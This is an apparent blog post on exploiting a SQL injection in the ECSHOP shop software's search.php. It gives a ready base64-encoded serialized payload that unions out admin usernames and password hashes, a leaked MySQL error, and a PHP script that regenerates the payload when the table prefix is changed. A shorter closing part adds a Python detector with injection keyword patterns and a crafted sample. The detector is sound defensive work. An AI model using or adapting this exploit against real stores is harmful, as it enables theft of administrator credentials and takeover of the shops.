ECSHOP: using the EXP found online:

search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319


Response:
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT goods_id, COUNT(*) AS num FROM `ccwww`.`ccc_goods_attr` WHERE 0 OR (1 AND attr_id = '1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'"\') union select 1#"'),1 from ecs_admin_user#' AND attr_value LIKE '%1%' ) GROUP BY goods_id HAVING num = '1' ) [2] => Array ( [error] => Table 'ccwww.ecs_admin_user' doesn't exist ) [3] => Array ( [errno] => 1146 ) )
The cause is that the database table prefix has been changed.

Solution: regenerate a variant of the EXP file.

Use the following code to generate a new encoded string:


<?php
$p="ecs_";
$p=isset($_REQUEST['pre'])?$_REQUEST['pre']:$p;
$arr=array("1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'\"\\') union select 1#\"'),1 from ".$p."admin_user#"=>"1");
$exp = array("attr"=>$arr);
$exp = base64_encode(serialize($exp));
//echo $exp;
?>
<textarea name="textarea" id="textarea" cols="100" rows="5"><?=$exp?></textarea>


Save the above code as webshell.php,

change the red ecs_ table prefix to the blue ccc_ table prefix used as the example in this article,

then access it via https://www.webshell.cc/webshell.php to generate the new BASE64-encoded payload.
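From the defending side, the request shape shown above (search.php's encode parameter carrying base64 of a PHP-serialized attr array) is what a WAF rule or access-log scanner can screen for. The following Python is an added example, not ECSHOP's code or this blog's; its samples are constructed, and the keyword list is an assumption about what a legitimate attribute filter never contains.

```python
import base64
import re

_STR_HEADER = re.compile(rb's:(\d+):"')
# SQL syntax that never belongs in a product-attribute filter value (assumption).
INJECTION_PATTERNS = [rb'\bunion\b.*\bselect\b', rb'\bselect\b.*\bfrom\b',
                      rb"'\)?\s*(and|or)\b", rb'#|--|/\*']

def php_serialized_strings(blob: bytes) -> list:
    """Return every string (key or value) in a PHP serialize() blob.
    Walks by each entry's declared byte length, so quotes, semicolons or
    braces embedded in a value cannot derail the scan."""
    out, i = [], 0
    while True:
        m = _STR_HEADER.search(blob, i)
        if not m:
            return out
        n, start = int(m.group(1)), m.end()
        out.append(blob[start:start + n])
        i = start + n + 2  # step over the closing '";'


def is_suspicious(encode_param: str) -> bool:
    """True if the encode parameter carries SQL syntax (or is not base64)."""
    try:
        blob = base64.b64decode(encode_param, validate=True)
    except ValueError:
        return True  # the legitimate search form never sends malformed base64
    for s in php_serialized_strings(blob):
        if any(re.search(p, s.lower()) for p in INJECTION_PATTERNS):
            return True
    return False


def _s(v: bytes) -> bytes:
    """Encode one PHP serialized string, used only to build the samples."""
    return b's:%d:"%s";' % (len(v), v)

# Constructed samples, not captured traffic: a normal attribute filter and
# one whose attribute id smuggles a UNION, shaped as search.php receives them.
BENIGN = base64.b64encode(
    b'a:1:{' + _s(b'attr') + b'a:1:{' + _s(b'5') + _s(b'12') + b'}}').decode()
SUSPICIOUS = base64.b64encode(
    b'a:1:{' + _s(b'attr') + b'a:1:{' + _s(b"1') union select 1,2#")
    + _s(b'1') + b'}}').decode()

if __name__ == '__main__':
    for name, param in (('benign', BENIGN), ('suspicious', SUSPICIOUS)):
        print(name, 'flagged' if is_suspicious(param) else 'clean')
```

Such a check only buys time for patching; the durable fix is the vendor update that stops splicing attr values into the SQL string.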

When reposting, please credit WebShell'S Blog; this article's address: https://www.webshell.cc/1459.html